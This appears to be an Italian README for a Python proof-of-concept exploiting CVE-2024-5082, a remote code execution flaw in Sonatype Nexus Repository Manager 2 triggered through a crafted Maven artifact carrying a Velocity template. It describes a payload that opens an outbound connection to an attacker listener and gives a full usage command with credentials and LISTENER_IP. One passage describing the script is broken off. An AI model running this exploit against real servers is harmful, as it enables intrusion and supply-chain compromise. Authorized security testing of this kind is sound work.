
Sonatype Nexus 2 - POC RCE Autorizzato
Questo repository contiene un proof of concept in Python per CVE-2024-5082, una vulnerabilità di esecuzione remota di codice in Sonatype Nexus Repository Manager 2.
La vulnerabilità consente a un utente con permessi sufficienti di pubblicare un artefatto Maven appositamente creato e contrassegnarlo per l'elaborazione da parte del generatore di contenuti Velocity. Quando l'artefatto viene recuperato, il template Velocity incorporato viene valutato da Nexus e può eseguire un comando nel contesto di sicurezza della JVM di Nexus.
Secondo Sonatype:
Il comando viene eseguito sull'host di Nexus Repository.
Scaricare l'artefatto interessato da un server di build, un server applicativo o una workstation di sviluppo non esegue di per sé il comando incorporato su quel sistema consumatore. Tuttavia, il compromesso di un repository manager può creare un rischio più ampio per la supply chain se un attaccante successivamente modifica artefatti fidati, input di build, credenziali o configurazione del repository.
Lo script:
maven-metadata.xml appositamente creato in un repository hosted selezionato.velocity.Il payload fornito crea una connessione TCP in uscita dall'host Nexus all'indirizzo del listener configurato.
Lo script attuale utilizza l'autenticazione HTTP Basic e richiede:
python3 cve_2024_5082.py \\
--base-url https://nexus.example.test/nexus \\
--repository security-test-snapshots \\
--username test-user \\
--password 'REDACTED' \\
--lhost LISTENER_IP \\
--lport 8000